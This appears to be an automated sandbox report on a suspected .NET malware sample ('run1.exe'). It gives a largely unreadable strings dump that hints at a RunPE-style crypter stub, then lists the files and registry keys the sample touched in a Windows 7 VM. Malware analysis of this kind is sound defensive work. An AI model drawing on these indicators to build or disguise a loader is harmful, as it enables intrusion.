h81,
ewqn1
L:0HC
Cs@m H
lyh/u
_79p&WK
3H]e
}6Q`
Bzi<
=DNPQ|U
h@'X
G a8iF26$
~"cr
'0$|
gP5I,
!t 2Q0
!<')}9
bMG=w
tG:>8
ToArray
t<en
-( MH#
f$yp
sbRf
P[gdMf
VKDV
iR!mt
hH*JMX%
;u>ML}&a"p/
8jzjF
~"gEv
6"c-U
e4
xA?
AGOVT"D*'
jJ R
Xp;a
:OdcXS X
DrvK
CV^c
\hF#
5( O
HA8j
xWS
Ij+.a&
W*o/yZ
4Z i
>,~
}~(c
CnxE\
5c'=
y[[F>
p 4!^
Y#67s
{[>s
! (0
:KU{
;@L (9~
FUyB
Load
.Ve@_
V<'{
Xn+f
xcb$MQDQG
:Q5m
9]!c
A~>)
Ks$
}C7E
<(4'
?&hy
w [0
Io{!0
-$0D
U}7I9o
6`XS
[j:5
,\z6
U%hb
Kf:P
D@[
% yM ?M
,T'\
;ZI=
.x3H
=|7s0
-M{C
>Ly;
>0o S
<usd
8SZ?L
5No%
Y2XqXCX
O|)G
vSJsT
&l/!
:-~\
4faW
v") )
\-Z}dl
k'Ns
,t8{
de3}
iW-vh
\*3PsHk
2l
-8./
[.#"yV
$cCY
%h(|>
5 *#
Xo 2(
zn F
U[cH1`
a{lO
J9!#4
2<HH
TX^b
+@OS
jkgz
6b.W;
&zh,
sQB0
~O-)
sb1{
D?NA
!3rC
Cc@|
*Y>`
J=DH
#b wbo
Ks^r
$\,?
>Y~
trY5
<lzD
<]:.[
olf1e
V6hx
nMJ:
<i)x
-pr)
iOhq
94<)
<h6 |
'<5|
bs9"
9pC
q`=EIg
kBgz
x9}P
@jTO
6N5/$
r7)l
S/4
E?7=
8D!\
MI?6r
vql.
/3(+
=$Y/2
+X7)O
Fmif
'FlD
|`Sh
{k8B
<6`qM[%~6
8n `@
$I`A
1 H
_Bq,
? zY)
RD(V
nSvE!
d@cG
z#11
Xk#8N
%5vV
!wnO
}2?%:W
aQt;Tp
YxVJuF
rp}k
"" 5
+ymc##T][
22yl
\@}T
2rlS
D*P:
Q[d5U
&`D(,
AL5El|
;xs`
ncrypt
+2$
tqd
PV e[
'wq&
;Fy
Zlcy
b@(d
oS#Pa
U4.a
h ,)
Eoji
$In3
N &
;&0#
$]T3
gHg
:)u4
a(a8/
)B5r
".;(
Ql}HD{
<Ju#
XEHT9
_(hn
y SKD
U{ K
_m2u
e0WF
~+@}
$ !
i@VW
2JrQ
}3R=/ g
H#tg
zaX5
M'>Q
D&v/
sRGB
Rl8KK
9!#E
x"=Sk~
x%T48
Lr= b
W m
AA
%U(DD
2cK|
+5}t|k
jQ8R
0H[6
k#w|i9V
H{?W
'l6&
JNbd
qOc9
uGT?
{ ?~
lmC3t
(Bsq
EP%I
b6f
L{\ i;
=. V1
0 a1 u
Qyer
EcN6
O"k"
)!lV
;>F&DZK
6^N<.>Y
f (;
T5vC
V%;o
h?/-
6a G8x
Vh&k
:$1TD
"q_A
SZf'
|-eZ
|;O
!Vu^x
5/)J
^^jf
(p].hC
UHp{z
~Xv\
Qqc}HU
C 5
$Y/3
:x+J`w
.Sh_
b<$)
0"tW
6AD5
Ux7
| q;?|
!CqI
Oc~
~)z
/HZ|
(4|c8
|8{u
3e7G
10;YE
v}.0
Aua]
JV ld
^Q 7N
]VO4
U, ,O
-79;
rEgD
DJY9
m5t?
>%_O@+l
SEm/
@B3zr{'
<` 2
=RL\r
] $@7[
$P; !
EueK
h3Dc
J~;f
5lJI
V`!i
8QF9
v! ,;
b+7Ef
g&AQ
}*[L
dq&V
Ay&;B
O>?qf
dR3Zo
^q?r
= @U
cs8Kq
!,=
?9eG
1+U
`R%H
pL7;
Z :i
_B;(
k`YQFUt
s4bK
2MrO
>{^
H++Wa
/_B
8h7^|&BfKL
'LLCh3
oeIe~>
ouH!k
iA.S2
LSNuJt
~"JRM
hU$2d
ESC6dH
sZg[PT
}{
HHDU
MLzmn
4}+\
6 6
g=%:
986W'
O[2y
Mn#"
w'9!
9K2`
'#&=
}MO=
L#J{1
=;PB
}cL5
X!'4{
2,;_
4[#`f
/[6E;0
%%Pu%
,*PpW3r
Ir?b
R@I)
`Y{Y
VPhl
"jg"
K%x
O_Qb
l{b-
$t!J
^;F,N+
{>EF
#; ~
plB`,<
; {4
q=si m
qPJF
@nIo
8{k<
, bnY;
PpRJ
q)) iM
gd==
JTV
w7gK:
gG5t
6^Ave
o.:
9Q[>D
-qgo
g~F
ooYU
Py9S
T W"
]du$P
AU}O
U>\%Z
r4x-|b1+
:0zd
Tl_
}BUh"
5XMF
Wj-6K
">dN
&w M
7 <|
nV|j
q3cZ
F+B;h[[upY
ovJ,
tbPb
+c^
*qGX
FJcps
j6tg
P u L
|'s-{
P<O6
+ 'M3
{JAa
! 8T$
d0_,
DO*W
f:1(A
eLQS
h+it
5)sS'
{KP
Z^iI
zCA_
l -[
wG.+r
\= O
d5<,
Z^{6
]f>U
L<t(
>>|_2
2rcr
e/S!
k4gX
co{
[O:1{~
g{3)
mz6!
$# V
"!0we
>'xg
!/&D3
z3y|
WhSk
op=50
P `5R tz
$!=o$$
=]DR
]$bL
7qr2v
N~t\t
\F+Q
{1ca
#@31q
5pvIu
#_gY
~B)m!
'k,1
~?+l
,\H_
I,>H
66C&
W@p[
KXG1>
c~y:H
i[vo
My>C
X~"k
!uSJb
JRGo
F74aR
K``p2
Exception
MR|He
.%+ *
^&P~vN
Vw\,c
t'
Xgrv
%n$a
nm"U;S
w9r$
| ,&:
0Y7W
Y8$/
3v L
L/ q7
7Gyx
`E</%
Y9r
=.8x
6 _W
Yr$N
ts
.u?
f9h*
Q.F@
71LQ>
S9~)s$
Z5ns
&2(
GB{Bm
*ujB*
SymmetricAlgorithm
K*}^
WcQ?
~Kj{
PVh\
eTNn
~ypf\o
oCH&
sQ`1
0?r;I
|}ol{f
,% i
6RWy
<fcP
WN~6
kc\Z
OM #tGG&
fp9`L
-&.j
B?yH
>!,1
t O=
cs_[
bCT3
Un#i
~<ZU
sm`}
tPQc
HzTyt~
2q o
e#5(`6f
-I]w
{?Wrs
+w"I~0
.59\o
3RUC
&`T~
.mvF
DyYt
<AmI|
v8 4
{!99
m{U@
G5Lo
Lm(Xw
RE,i
Wh[#
Ky-^
Arf!C
"``,
H> y
c^T~@
^9j
ZO;$
[iZX
hwvE
E e0
# E^7
o|Kmr
R:2\
a/)<
,U0T"
@rFP
`fNV
Oq 3
jr`'
OmB2
U6|@+
$N 0@RT
if{I
\[.v
;B|:D
[$/ga
(iM}
TX9X4
!j XU/l-)Hj5
u 7-W
System.Runtime.CompilerServices
OYLz
XcnS
Sqqr..;U
=.p+
<u
SwY?
%K{z
VWnec
.~PF
'LKeF
y},' M
Er'&
BxCR@
? 3
/St}
HcB!Y
Qx!s
%bn)j
,XK#
)U~f
x+[4F
-5vh
vb3P
Uf^t
Ud^{
1/ x0([ xT
ls]6
:Geai
-_>x
/g=,
i| X
qDJn=}
zX'<[
TransformFinalBlock
|csK
'{3a
T x4
6s"vM8
`C\ME*
3?0K
BFhT4
(0YR6
:'f]H/
+|J6
l.Ls
(([
\u}a=
wr=][A
u%&>
67l?9W
.-r
DFgy
.nK0E
YL G
QXYR
HyWlHYT
#!'a2
\h~|
;$ A
iI L-
YxCX-
PmOf$
set_IV
fW\2
l`1-
pRms
6G<G
5 T
^Qc3B-
q ,)
@jV
6A"$
+n*s
b3Q 194
-u
_J&%
3zpfK
'eGm
g:3J8
ZY@E
GaY[
h@:a
!829
OkTr+q
A3$e2
O?.C3:
Q`Dt.
wOSWV
Qu~%
}LEq
*Uz
=/W9K?t
=@`r,e
";] .k<
U#o+
W@/%s
_^ 7
M du
3X+
u51m
Fpl\
0]&&
(6Id
] ::
n'|g
=E)*
U7FK
r 2vP
0c h
4Qdn
g7\;~
5Le6
h& Z
l5Mw
w. W
pcBbq
\,60
AG*8&
lRfb!Uk
^~\ %
VKl{m
A('@
[Va ~
*gu~
.+[o
!V`/
~2>=
^y>
?hP1a
rok&f
A_<o
smx4
izh-T
I#]
prj;
W;M}
''q
cxT8'
|Jy ,
r!o+
9;S2<
t%yX
T 21
Q;%9|2q=e
TbIg;@
#GUID
f!>Q
%Dcc
F{cO
|^D\
~P1n
~/7xl
`RD(
}7uN
hzzh
[/w^St
wGFk
KU5Gm
;qa9
+"; 4
-9VL=
$a?V9
c%|+
Lh[P
/fsx
Uh'L
=2 y
#BPD
A`3|
K%fM
P.A'hb
tFor
CrJ4
HY:k-
0GMs
w2-v>7
rY$F
B3@I
94$>
nL* P6
-dh ?6
J{GA;
lh-wp03};
fO@J70
y8PS9
UvlV3
=sFF
zx5>
TC|w
\@X
GbDv|
x(}U
"G,nk
"zSy
s!_
`NTu
QL >
ee)O
`L3|
;\-
z.h+px\
BBCaU
_:
2NP5
.Vrg
X8 x
:sm?<)x-7"
|w9l |
}.h%
L?.5
@`0|j
;l\f5*
*bi>
>{RBm2
yWR0
*2tg
\D&R
4Md=5
9-x&[e
p_VbCq
get_CurrentDomain
z;-"
CWs& z
% NM
5mUx"z>-
I+ ;
'P^8
d]@L
L)?3y$
:$ >
-qwE
GE[E
wCz]
&oy"=
IEnumerable`1
XJC]
!a*(
oZ%C
x+Hj+*fkcxs
J~O?
a[x~
p#?g
+oD}
XZ(e-
-,R#
GO-p?M
ZWnBF
l>5r6
e8obs
/xnt
'\l%
Ekp*?$|
w_^L6
*cE%AG
ZYgH
roh`
-g?k
'?+o
#DqQ
mz&N
Ie}k
snspo
wy $
GetTypeFromHandle
R#=@
|vvKP
y aO
%bQ.
-f:
Mel
0!rw
B,',
KJORD3w
<cB
Zg{O#p
[zh`
d!Ke
%c9;
"JL7
9R L-
I(qP/
Ma?=V
5u P
TJ(
i 9!
tbJIIaE
SIa/
K/>B
+ I>
`+ [wSKy
&2D
=(S-
%ZL5
{zwh1
:M!ZT
) p
NgLJ
F;*'
.<F9
)W-`
VWg<
s<:l
&h(4
-d(Y
Pvi*
ooCJ
9 mk:O
+J}t
OydU;
Zr,_n
]c8z
=iQT
3= 0
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
&"M
$Pwex
QnjH
|y 9
dxp=N
@J+;
~Ff0
vr]s,l @
YH}f.
f?Fk
"sD/Q
HqC<
7>1 &
KRLo
System.Collections.Generic
~*-
as %
%:FOuS
I f
yTh_
DD4Ab
CUpA
C'r:vh
b BYr
?=K
JnzMn
n|y&
('';N
/mMv
+}<j
H8d?
SR&,P
,4@0
1 f@g
l9&w
EU7Q(
]6{G
^E'gR
Si)A
|QWc
@J"
4V?
`_+Q
O5 "Z
cXvUH
t2U=
?7`G
_16
ICryptoTransform
aYF
G)m~
,|=!W#V%#^
1@OdiD
Bd"GS
piTq+Z(R.
hB| |
,(gQ
jG{*
rPU/
D95E
;nK9lR
#eff`
j{`A
n+&2utW
hkM/
fQf=
/1KGAE
nDHs
u(e*
q /{ry@
/KdYkZ
J$\E
d ld:
P.j:lU
*_t^o
{D>B
8 p1
jC '
q?$i-
*NFq
h) 1e
-UML
nuu`
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-05-21 16:49:16 2018-05-21 16:52:08 172

6 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-05-21 16:49:16 2018-05-21 16:52:08 172

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\run1.exe.config
C:\Users\Seven01\AppData\Local\Temp\run1.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\run1.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\run1.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\ncrypt.resources\ncrypt.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources\ncrypt.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\ncrypt.resources\ncrypt.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2324.32442968
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2324.32442968
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2324.32443031
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\run1.exe.config
C:\Users\Seven01\AppData\Local\Temp\run1.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll

Write Files

Nothing to display

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2324.32442968
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2324.32442968
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2324.32443031

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\run1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
